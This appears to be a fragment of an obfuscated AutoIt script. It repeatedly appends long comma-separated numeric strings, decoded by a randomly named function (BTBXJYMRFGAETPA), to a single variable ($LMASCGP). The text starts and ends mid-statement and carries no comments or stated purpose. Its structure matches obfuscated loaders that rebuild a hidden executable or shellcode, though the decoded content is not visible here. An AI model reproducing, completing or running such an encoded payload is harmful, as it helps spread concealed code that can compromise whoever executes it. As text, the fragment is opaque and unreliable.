("56,56,56,57,56,53,56,58,57,57,56,53,56,6,56,55,56,6,56,6,57,54,57,58,57,54,57,54,57,54,57,54,56,54,56,55,56,54,56,59,56,53,56,56,56,54,56,55,57,57,56,53,56,6,56,55,56,6,57,57,57,54,57,58,57,54,57,54,57,54,57,54,56,56,56,5,56,54,57,55,56,53,56,57,56,53,56,56,57,57,56,53,56,6,56,55,56,5,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,54,56,59,56,54,57,55,56,54,56,57,56,54,56,55,56,6,56,6,56,6,56,55,56,5,56,56,57,54,57,58,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,55,56,60,57,54,57,55,57,54,57,54,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,57,54,56,55,57,57,56,56,57,58,56,54,57,55,56,54,57,54,57,57,56,53,56,6,56,55,56,55,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56,53,56,53,56,54,57,55,56,56,56,56,56,54,57,57,57,57,56,53,56,6,56,55,56,55,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,57,56,53,56,57,56,57,56,57,56,57,56,58,57,57,56,53,56,6,56,55,56,55,57,57,57,54,57,55,57,54,57,54,57,54,57,54,56,55,57,57,56,56,57,54,56,54,57,57,56,54,56,55,57,57,56,53,56,6,56,55,56,54,56,60,57,54,57,55,57,54,57,54,57,54,57,54,56,57,56,57,56,57,56,58,56,58" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,55,56,54,56,56,56,54,56,54,57,57,56,53,56,6,56,55,56,54,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,57,56,54,57,57,56,6,56,6,56,6,56,55,56,54,56,54,57,54,57,55,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,60,56,56,57,54,57,54,57,54,57,54,57,54,57,54,56,56,57,54,56,54,57,57,56,54,56,55,56,57,56,57,57,57,56,53,56,6,56,55,56,60,56,6,57,54,57,54,57,54,57,54,57,54,57,54,56,57,56,58,56,58,57,55,56,54,56,56,56,54,57,57,56,54,56,54,57,57,56,53,56,6,56,55,56,60,57,57,57,54,57,54,57,54,57,54,57,54,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,56,54,57,57,56,60,56,60,57,57,56,53,56,6,56,55,56,53,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,56,56,57,56,53,56,58,57,57,56,53,56,6,56,55,56,53,56,56,57,54,57,57,57,54,57,54,57,54,57,54,56,54,56,55,56,54,56,59,56,53,56,56,56,54,56,55,57,57,56,53,56,6,56,55,56,53,56,6,57,54,57,57,57,54,57,54,57,54,57,54,56,56,57,56,56,53,56,55,56,53,56,56,56,54,56,59,56,54,56,54,57,57,56,53,56,6,56,55,56,53,57,57,57,54,57,57,57,54,57,54,57,54,57,54,56,54,57,55,56,53,56,56,56,6,56,6,56,6,56,55" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,53,57,55,57,54,57,57,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,55,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,56,57,54,56,53,56,60,57,57,56,53,56,6,56,55,56,54,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,54,56,55,56,54,57,55,56,56,57,56,56,53,56,55,57,57,56,53,56,6,56,55,56,54,56,56,57,54,57,56,57,54,57,54,57,54,57,54,56,53,56,56,56,54,56,59,56,54,57,55,56,53,56,56,56,6,56,6,56,6,56,55,56,54,56,6,57,54,57,56,57,54,57,54,57,54,57,54,57,57,56,53,56,56,56,55,57,57,56,56,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,57,58,56,54,56,55,56,53,56,58,56,54,57,55,57,57,56,53,56,56,56,55,57,57,56,6,56,54,56,55,56,54,57,57,56,57,56,57,56,57,56,58,56,6,56,6,56,56,56,55,57,56,56,60,56,6,56,6,56,56,56,55,57,59,56,56,56,6,56,6,56,6,56,55,56,57,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,54,56,56,57,59,56,59,56,57,56,60,56,60,56,60,56,60,56,60,56,60,56,60,57,57,56,53,56,56,56,55,57,57,57,57,56,58,57,55,56,54,56,56,56,54,57,57,56,54,57,57,57,57,56,53,56,56,56,55,56,5,56,6,56,56,57,58,56,56,56,55,56,55,56,58,56,56,57,55,57,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,53,56,56,56,55,56,5,57,57,56,56,56,55,56,56,57,57,56,57,56,57,56,57,56,58,57,57,56,53,56,56,56,55,57,59,56,60,56,58,57,55,56,56,56,56,56,56,57,57,56,56,57,57,57,57,56,53,56,6,56,55,56,57,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,56,56,57,56,53,56,58,56,54,56,55,56,54,56,59,57,57,56,53,56,6,56,55,56,57,56,56,57,54,57,56,57,54,57,54,57,54,57,54,56,53,56,56,56,54,56,55,56,56,57,56,56,53,56,55,57,57,56,53,56,6,56,55,56,57,56,6,57,54,57,56,57,54,57,54,57,54,57,54,56,53,56,56,56,54,56,55,56,53,56,6,56,55,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("53,56,6,57,58,56,56,56,60,56,60,57,57,56,6,57,58,56,56,56,60,56,59,56,56,56,6,57,58,56,60,56,60,56,6,57,58,56,55,56,6,56,59,56,60,56,6,57,56,56,56,56,55,57,56,56,56,56,55,56,60,57,55,56,6,56,58,57,55,57,55,57,57,57,54,57,54,57,54,57,54,56,6,57,58,57,54,56,60,56,6,57,56,56,56,56,55,57,58,56,6,56,55,56,60,57,55,56,6,56,58,56,57,57,55,57,57,57,54,57,54,57,54,57,54,56,6,57,58,57,54,56,6,56,6,57,56,56,56,56,55,57,57,56,56,56,55,56,60,57,54,57,54,57,56,56,54,56,55,56,5,56,56,56,60,56,55,56,60,56,6,57,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,56,56,55,57,57,56,56,56,55,56,60,56,6,57,56,56,6,56,55,57,59,57,57,57,55,57,57,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,57,56,56,53,56,6,57,56,56,56,56,55,56,5,56,6,56,6,56,57,57,57,56,56,56,60,57,57,56,55,56,60,57,54,57,54,57,56,56,54,56,55,56,5,56,56,56,60,56,55,56,60,56,6,57,56,56,56,56,55,56,5,56,6,56,55,56,60,56,6,57,56,56,6,56,55,57,59,56,56,57,55,57,59,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,57,56,56,53,56,6,56,57,57,57,56,56,56,60,57,57,56,6,57,56,56,6,56,55,57,59,57,57,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("55,57,57,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,59,56,5,57,55,57,56,57,54,57,54,57,54,57,54,56,6,56,57,56,54,56,55,57,55,56,6,56,60,56,60,56,6,56,55,57,57,56,60,56,53,56,55,56,59,56,53,56,6,57,56,56,6,56,55,57,59,56,56,57,55,57,59,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,5,56,55,57,55,57,56,57,54,57,54,57,54,57,54,56,6,56,55,57,57,56,60,56,53,56,55,56,60,56,53,57,57,56,53,56,56,56,55,57,55,56,6,56,60,56,59,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,57,56,56,55,56,6,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,54,57,54,57,54,57,54,57,54,56,55,56,59,56,6,57,58,57,56,56,6,57,55,56,6,57,58,56,54,57,55,57,58,57,54,57,54,57,54,57,54,56,57,56,57,57,56,57,58,56,6,56,5,56,5,57,56,57,55,56,56,57,54,56,6,57,54,57,54,57,54,57,54,56,57,56,5,56,55,57,56,57,55,56,6,56,60,57,54,56,6,56,56,56,55,57,55,56,60,56,53,56,60,56,60,56,60,56,60,56,6,56,5,56,5,57,56,57,55,56,56,57,54,56,6,57,54,57,54,57,54,57,54,56,6,57,56,56,6,56,55,57,57,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,57,56,56,54,56,55,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("5,56,56,56,60,56,55,56,60,56,6,57,56,56,6,56,55,57,57,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,6,56,55,57,58,56,56,57,55,57,55,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,57,56,56,53,56,6,57,56,56,6,56,55,57,56,56,6,57,54,57,56,57,54,57,54,57,54,57,54,56,6,56,57,57,57,56,56,56,60,57,57,56,55,56,60,57,54,57,54,57,56,56,54,56,55,56,5,56,56,56,60,56,55,56,60,56,6,57,56,56,6,56,55,57,56,56,6,57,54,57,56,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,6,56,55,57,58,57,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,54,56,60,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,57,56,56,53,56,6,57,56,56,6,56,55,56,59,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56,6,56,57,57,57,56,56,56,60,57,57,56,55,56,60,57,54,57,54,57,56,56,54,56,55,56,5,56,56,56,60,56,55,56,60,56,6,57,56,56,6,56,55,56,59,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,6,56,55,57,56,56,56,57,54,56,54,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,57,56,56,53,56,6,57,56,56,6,56,55,56,53,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("6,56,57,57,57,56,56,56,60,57,57,56,55,56,60,57,54,57,54,57,56,56,54,56,55,56,5,56,56,56,60,56,55,56,60,56,6,57,56,56,6,56,55,56,53,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,6,56,55,57,57,57,57,57,54,56,56,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,57,56,56,53,56,6,57,56,56,6,56,55,57,55,56,60,57,54,57,55,57,54,57,54,57,54,57,54,56,6,56,57,57,57,56,56,56,60,57,57,56,55,56,60,57,54,57,54,57,56,56,54,56,56,56,60,56,55,56,5,56,55,56,60,56,6,57,56,56,6,56,55,57,55,56,60,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,55,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,6,56,55,57,57,56,56,57,54,56,58,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,57,56,56,53,56,6,56,57,57,57,56,56,56,60,57,57,56,6,57,56,56,6,56,55,57,58,57,57,57,54,56,60,57,54,57,54,57,54,57,54,57,55,56,6,57,59,56,59,57,55,57,58,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,59,56,60,56,6,57,56,56,6,56,55,57,58,56,56,57,55,57,55,57,54,57,54,57,54,57,54,57,55,56,6,56,5,56,57,57,55,57,58,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,60,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,56,6,57,56,56,6,56,55,57,56,56,56,57,54,56,54,57,54,57,54,57,54,57,54,57,55,56,6,56,6,56,55,57,55,57,58,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,59,56,56,56,6,57,56,56,6,56,55,57,57,57,57,57,54,56,56,57,54,57,54,57,54,57,54,57,55,56,6,56,53,56,53,57,55,57,58,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,56,59,56,6,56,6,57,56,56,6,56,55,57,57,56,56,57,54,56,58,57,54,57,54,57,54,57,54,57,55,56,6,56,54,56,5,57,55,57,58,57,54,57,54,57,54,57,54,56,6,57,58,56,55,57,56,56,59,56,56,56,6,56,5" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,56,56,55,56,59,57,57,56,6,57,56,56,6,56,55,56,56,56,6,57,54,57,54,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,59,57,54,57,55,57,59,57,54,57,54,57,54,57,54,56,6,57,58,57,54,56,60,56,6,57,56,56,56,56,55,57,59,56,6,56,55,56,60,56,6,56,5,57,58,56,55,57,55,56,60,57,54,56,6,57,54,57,54,57,54,57,54,57,55,56,6,56,5,57,55,57,55,57,59,57,54,57,54,57,54,57,54,56,6,57,58,57,54,56,6,56,6,57,56,56,6,56,55,56,60,56,56,57,54,57,54,57,54,57,54,57,54,57,54,56,55,56,60,57,54,57,54,57,56,56,53,56,6,57,58,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("55,57,56,56,59,56,56,56,6,56,5,56,56,56,55,57,55,56,6,56,6,57,56,56,6,56,55,56,55,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,6,56,59,57,55,57,59,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,58,56,6,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,58,56,60,57,54,57,59,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,56,56,55,57,55,57,57,56,55,56,60,57,54,57,54,57,56,56,53,56,55,56,60,57,54,57,54,57,56,56,54,56,6,56,5,56,6,56,55,57,57,56,56,56,60,56,60,56,60" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,60,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,56,56,55,57,55,57,57,56,55,56,60,57,54,57,54,57,56,56,53,56,55,56,60,57,54,57,54,57,56,56,54,56,6,56,5,56,6,56,55,57,57,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,57,57,56,6,57,54,57,56,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,56,56,55,57,55,57,57,56,55,56,60,57,54,57,54,57,56,56,53,56,55,56,60,57,54,57,54,57,56,56,54,56,6,56,5,56,6,56,55,57,58,56,56,56,60,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,54,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,56,56,55,57,55,57,57,56,55,56,60,57,54,57,54,57,56,56,53,56,55,56,60,57,54,57,54,57,56,56,54,56,6,56,5,56,6,56,55,57,58,56,6,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,53,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,56,56,55,57,55,57,57,56,55,56,60,57,54,57,54,57,56,56,53,56,55,56,60,57,54,57,54,57,56,56,54,56,6,56,5,56,6,56,55,57,58,56,60" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,59,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,56,56,55,57,55,57,57,56,55,56,60,57,54,57,54,57,56,56,53,56,55,56,60,57,54,57,54,57,56,56,54,56,6,56,5,56,6,56,55,57,59,57,57,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,59,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,56,56,55,57,55,57,57,56,55,56,60,57,54,57,54,57,56,56,53,56,55,56,60,57,54,57,54,57,56,56,54,56,6,56,5,56,6,56,55,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("58,57,57,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,57,56,56,60,57,54,57,59,57,54,57,54,57,54,57,54,56,55,56,60,56,6,57,56,56,56,56,55,57,55,57,57,56,55,56,60,57,54,57,54,57,56,56,53,56,55,56,60,57,54,57,54,57,56,56,54,56,6,57,58,56,55,57,56,56,59,56,56,56,6,56,5,56,6,56,55,57,59,56,6,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,57,57,57,57,54,56,5,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,58,57,57,57,55,56,5,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,56,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,60,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,59,57,59,57,55,56,5,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,57,55,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,54,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,5,56,6,57,55,56,5,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,58,56,56,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,57,54,56,6,57,54,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("59,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,6,56,54,57,55,56,5,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,57,55,57,57,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,56,56,6,57,54,57,54,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,53,56,56,57,55,56,5,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,60,56,56,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,57,55,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,54,56,58,57,55,56,5,57,54,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,54,57,54,56,6,56,5,56,6,56,55,56,5,57,57,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,56,56,55,57,59,56,6,56,55,56,60,57,55,56,6,56,55,56,57,57,55,56,5,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,60,56,6,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,57,59,56,6,57,54,57,56,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,56,56,59,57,55,56,5,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,57,56,57,57,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,57,58,56,6,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,57,56,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,58,57,54,57,55,56,5,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,57,56,56,56,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,58,56,6,57,54,57,54,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,59,57,56,57,55,56,5,57,54,57,54,57,54,57,54,56,6,57,58,56,53,56,55,56,60,57,57,56,6,56,5,56,6,56,55,56,57,56,56,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,56,56,55,57,58,56,6,56,55,56,60,56,6,57,58,57,56,57,55,57,55,56,6,56,60" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,5,57,55,56,5,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,56,56,6,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,56,56,55,56,5,56,60,56,55,56,60,57,55,56,6,57,54,57,59,57,55,56,6,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,55,56,60,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,56,56,55,56,6,56,6,56,55,56,60,57,55,56,6,57,55,57,58,57,55,56,6,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,55,56,56,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,57,59,56,6,57,54,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("5,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,56,56,5,57,55,56,6,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,6,56,6,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,5,56,60,57,54,56,5,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,57,56,53,57,55,56,6,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,57,54,56,6,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,6,57,57,57,54,57,55,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,58,56,55,57,55,56,6,57,54,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,54,57,54,56,6,56,5,56,6,56,55,56,5,56,56,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,53,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,59,56,57,57,55,56,6,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,59,56,60,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,5,56,6,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,5,56,59,57,55,56,6,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,5,56,6,56,60,56,60,56,60,56,60,56,60,56,60,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("6,57,56,56,6,56,55,57,55,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,53,57,54,57,55,56,6,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,6,56,60,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,57,59,57,57,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,54,57,56,57,55,56,6,57,54,57,54,57,54,57,54,56,6,56,57,57,59,56,55,57,55,56,6,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,6,56,5,56,6,56,55,57,55,56,56,56,60,56,60,56,60,56,60,56,60,56,60,56,6" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,56,56,6,56,55,56,56,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,55,56,56,57,55,56,6,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,57,57,56,6,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,57,56,56,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,56,56,58,57,55,56,6,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,54,56,60,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,58,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("6,56,57,56,60,57,55,56,6,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,53,56,56,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,5,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,59,57,55,57,55,56,6,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,60,56,60,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,57,54,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,60,57,57,57,55,56,6,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,59,57,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,58,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,54,57,59,57,55,56,53,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,57,59,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,56,56,6,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,55,56,6,57,55,56,53,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,6,57,57,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,57,56,56,6,57,54,56,5,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,56,56,54,57,55,56,53,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,57,54,56,56,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,57,57,56,60,57,54,56,5,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,57,56,56,57,55,56,53,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,57,54,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,58,56,60,57,54,56,5,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,58,56,58,57,55,56,53,57,54,57,54,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,54,56,6,56,5,56,6,56,55,56,53,56,6,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,55,56,6,57,54,56,5,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,59,56,60,57,55,56,53,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,57,59,56,56,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,57,57,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,6,57,55,57,55,56,53,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,57,57,57,57,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,56,6,56,55,56,54,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,53,57,57,57,55,56,53,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,57,54,57,57,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,57,59,56,6,57,54,57,59,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,54,57,59,57,55,56,53,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,53,57,57,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,58,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,55,56,6,57,55,56,53,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,54,56,56,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,55,57,57,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,56,56,54,57,55,56,53,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,55,57,57,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,57,54,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,57,56,56,57,55,56,53,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,59,56,6,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,60,57,57,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,58,56,58,57,55,56,53,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,55,56,6,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,58,57,57,57,54,57,55,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,56,59,56,60,57,55,56,53,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,60,57,57,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,55,56,60,57,54,57,59,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,54,57,55,57,55,56,54,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,54,57,57,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,6,56,60,57,54,57,59,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,55,57,57,57,55,56,54,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,56,5,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,57,55,56,6,57,54,56,6,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,56,57,59,57,55,56,54,57,54,57,54,57,54,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,56,6,56,5,56,6,56,55,56,59,56,56,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,57,56,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,57,56,6,57,55,56,54,57,54,57,54,57,54,57,54,56,6,57,58,56,55,57,56,56,59,56,56,56,6,56,5,56,6,56,55,56,57,56,6,56,60,56,59,56,60,56,60,56,60,56,60,56,6,57,56,56,6,56,55,56,57,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,55,56,60,57,55,56,6,57,58,56,57,57,55,56,54,57,54,57,54,57,54,57,54,56,6,56,5,56,6,56,55,57,56,56,6,56,60,56,60" ) $LMASCGP &= BTBXJYMRFGAETPA 